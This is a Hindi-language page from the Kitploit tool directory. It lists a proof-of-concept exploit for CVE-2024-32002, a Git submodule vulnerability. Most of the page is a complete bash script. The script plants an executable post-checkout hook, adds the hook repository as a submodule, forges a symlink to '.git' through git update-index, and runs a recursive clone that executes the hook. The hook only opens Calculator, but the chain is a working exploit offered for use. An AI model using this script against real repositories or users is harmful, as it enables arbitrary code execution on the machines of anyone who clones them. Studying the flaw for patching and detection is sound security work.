Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32002-Exploit — CVE-2024-32002 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक Git सबमॉड्यूल भेद्यता जो क्राफ्टेड रिपॉजिटरी और सिमलिंक के माध्यम से मनमाना कोड निष्पादन सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/bfengj/cve-2024-32002-exploit
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगआपूर्ति श्रृंखला सुरक्षारेड टीमिंग
GitHubbfengj/cve-2024-32002-exploit

CVE-2024-32002-Exploit

CVE-2024-32002 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक Git सबमॉड्यूल भेद्यता जो क्राफ्टेड रिपॉजिटरी और सिमलिंक के माध्यम से मनमाना कोड निष्पादन सक्षम बनाती है।

रिपॉजिटरी देखें
222 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
root@kitploit:~
#!/bin/bash

git init hook
cd hook
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
open -a Calculator.app
EOF


chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"
git remote add origin [email protected]:bfengj/CVE-2024-32002-hook.git
git push -u origin main

cd ..


git init exploit
cd exploit
git submodule add --name x/y [email protected]:bfengj/CVE-2024-32002-hook.git A/modules/x
git commit -m "add-submodule"

# 创建符号链接
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git remote add origin [email protected]:bfengj/CVE-2024-32002-Exploit.git
git push -u origin main
cd ..

#测试
git clone --recursive [email protected]:bfengj/CVE-2024-32002-Exploit.git exploited
टूल डाउनलोड करें